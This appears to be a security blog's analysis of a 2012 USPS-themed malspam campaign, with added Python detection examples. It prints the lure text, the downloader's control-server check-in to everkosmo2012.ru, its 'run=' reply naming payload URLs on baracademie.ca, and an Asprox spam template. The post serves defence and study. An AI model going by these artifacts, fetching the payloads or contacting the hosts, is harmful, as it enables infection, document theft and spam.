Contact to the nearest post office

On 2012-04-26 we observed a round of USPS-flavored spam. We analyzed a spam message with the subject line "Contact to the nearest post office". The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem at the following location: C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78
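The check-in and the `run=` reply above are exactly the kind of traffic a proxy log will record. The following is an added example, not code from the original post: it scans a few constructed proxy-log lines for the downloader's `/ab/index.php?r=gate` beacon, flags the impossible "Windows NT 9.0" in its User-Agent, and extracts the download URL from a `run=` control-server reply. Only the beacon URL, the User-Agent string, and the `run=` response come from the post; the log format, the client addresses, the second (benign) log line, and the list of known NT versions are assumptions made for this example.

```python
"""
Added example (not from the original post): detection logic for the
downloader check-in described above.  Scans constructed proxy-log lines
(format assumed: client method url "user-agent") for the C2 beacon and
parses the run= command out of a control-server response body.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Beacon shape seen in the post:
#   /ab/index.php?r=gate&id=<hex>&group=<date>_<x>&debug=<n>
BEACON_PATH_RE = re.compile(r"^/ab/index\.php$")
REQUIRED_PARAMS = {"r", "id", "group", "debug"}

# The downloader claims "Windows NT 9.0", a version that does not exist.
# Known NT version strings (assumption for this example, current as of 2012
# plus later releases): anything else in a Windows UA is suspicious.
NT_VERSION_RE = re.compile(r"Windows NT (\d+\.\d+)")
KNOWN_NT = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

# Constructed log lines: client, method, url, user-agent (quoted).
SAMPLE_LOG = """\
10.0.0.5 GET http://everkosmo2012.ru/ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
10.0.0.7 GET http://www.example.com/index.php?r=gate "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
10.0.0.5 GET http://www.baracademie.ca/_notes/ddd.exe "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
"""
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def is_beacon(url):
    """True if url has the beacon path and the full parameter set, with r=gate."""
    parts = urlsplit(url)
    if not BEACON_PATH_RE.match(parts.path):
        return False
    qs = parse_qs(parts.query)
    return REQUIRED_PARAMS <= set(qs) and qs.get("r") == ["gate"]


def bogus_windows_version(user_agent):
    """True if the UA advertises a Windows NT version that is not a real release."""
    m = NT_VERSION_RE.search(user_agent)
    return bool(m) and m.group(1) not in KNOWN_NT


def scan_log(text):
    """Return [(client, url, [reasons])] for every line that looks like the downloader."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log format
        client, _method, url, ua = m.groups()
        reasons = []
        if is_beacon(url):
            reasons.append("c2-beacon")
        if bogus_windows_version(ua):
            reasons.append("bogus-windows-version")
        if reasons:
            hits.append((client, url, reasons))
    return hits


def parse_run_command(body):
    """Extract the download URL from a 'run=<url>' C2 reply; None for anything else."""
    m = re.fullmatch(r"run=(https?://\S+)", body.strip())
    return m.group(1) if m else None


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, ",".join(reasons), url)
    # Response body quoted in the post:
    print(parse_run_command("run=http://www.baracademie.ca/_notes/ddd.exe"))
```

The beacon check requires the full parameter set rather than just `r=gate`, so the second (benign) line with a lone `r=gate` is not flagged; the User-Agent check on its own catches the follow-on download of `ddd.exe`, which has no distinctive path.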

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="%%BND:1%%"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.
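The template above fixes every header except the `%%TOKEN%%` slots, which gives a mail gateway something to match on. The following is an added example, not code from the original post: it parses a raw message and scores how closely its headers follow the Asprox template, treating a leaked unexpanded token (a bot bug that does happen) as a strong signal and the fixed header values as weak ones. The header values and token syntax come from the template in the post; the three sample messages, the weights, and the recipient-format check are assumptions made for this example. Note the caveat in the comments: a genuine Outlook Express 6 install emits the same `X-Mailer` and `X-MimeOLE` values, so those alone are not proof of anything.

```python
"""
Added example (not from the original post): a header fingerprint for mail
built from the Asprox template shown above.  Sample messages and weights
are constructed for this example.
"""
import re
from email import message_from_string

# Fixed header values copied from the template.  A real Outlook Express 6
# (XP SP2) install emits exactly these, so each is only a weak signal.
TEMPLATE_HEADERS = {
    "X-Mailer": "Microsoft Outlook Express 6.00.2900.2180",
    "X-MimeOLE": "Produced By Microsoft MimeOLE V6.00.2900.2180",
    "X-Priority": "3",
    "X-MSMail-Priority": "Normal",
}
# Unexpanded template tokens such as %%SUBJ%% or %%BND:1%% are a strong
# signal: no legitimate mailer emits them.
TOKEN_RE = re.compile(r"%%[A-Z]+(?::\d+)?%%")


def score_message(raw):
    """Return (score, reasons) for a raw RFC 822 message; higher = more template-like."""
    msg = message_from_string(raw)
    score, reasons = 0, []
    for name, value in TEMPLATE_HEADERS.items():
        if msg.get(name, "").strip() == value:
            score += 1
            reasons.append(f"header {name} matches template")
    if msg.get_content_type() == "multipart/mixed":
        score += 1
        reasons.append("multipart/mixed like template")
    # Template addresses exactly one recipient as To: <addr>, with no display name.
    if re.fullmatch(r"<[^<>@\s]+@[^<>@\s]+>", msg.get("To", "").strip()):
        score += 1
        reasons.append("single bracketed recipient")
    leaked = sorted(set(TOKEN_RE.findall(raw)))
    if leaked:
        score += 5
        reasons.append("unexpanded template tokens: " + ", ".join(leaked))
    return score, reasons


# Constructed message that follows the template with every token expanded.
SAMPLE_SPAM = """\
Message-ID: <20120426125208.1234@example.invalid>
From: "USPS Express Services" <notice@example.invalid>
To: <victim@example.invalid>
Subject: Contact to the nearest post office
Date: Thu, 26 Apr 2012 12:52:08 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_Part_01"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

------=_Part_01
Content-Type: text/plain

We couldn't deliver your parcel at your address.
------=_Part_01--
"""
# Same message, but the bot failed to expand the subject token.
SAMPLE_LEAK = SAMPLE_SPAM.replace(
    "Subject: Contact to the nearest post office", "Subject: %%SUBJ%%")
# Constructed benign message from another client; shares only X-Priority: 3.
SAMPLE_BENIGN = """\
From: Alice <alice@example.invalid>
To: Bob <bob@example.invalid>
Subject: lunch
Date: Thu, 26 Apr 2012 13:00:00 +0000
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
X-Mailer: Thunderbird 12.0
X-Priority: 3

see you at noon
"""

if __name__ == "__main__":
    for label, raw in (("spam", SAMPLE_SPAM), ("leak", SAMPLE_LEAK), ("benign", SAMPLE_BENIGN)):
        print(label, score_message(raw))
```

Used as a scoring feature rather than a block rule, the fixed-header match adds confidence to other indicators (the USPS lure, the zip attachment, or a sending host on the illinoisnot.ru infrastructure above) without rejecting real Outlook Express traffic.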

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.


2 Comments

  1. Stacey
    Posted May 3, 2012 at 7:41 am | Permalink | Reply

    So how do I get rid of this?

  2. Posted January 22, 2013 at 4:26 pm | Permalink | Reply

    I think the admin of this web page is really working hard in favor
    of his web page, for the reason that here every stuff is quality
    based data.
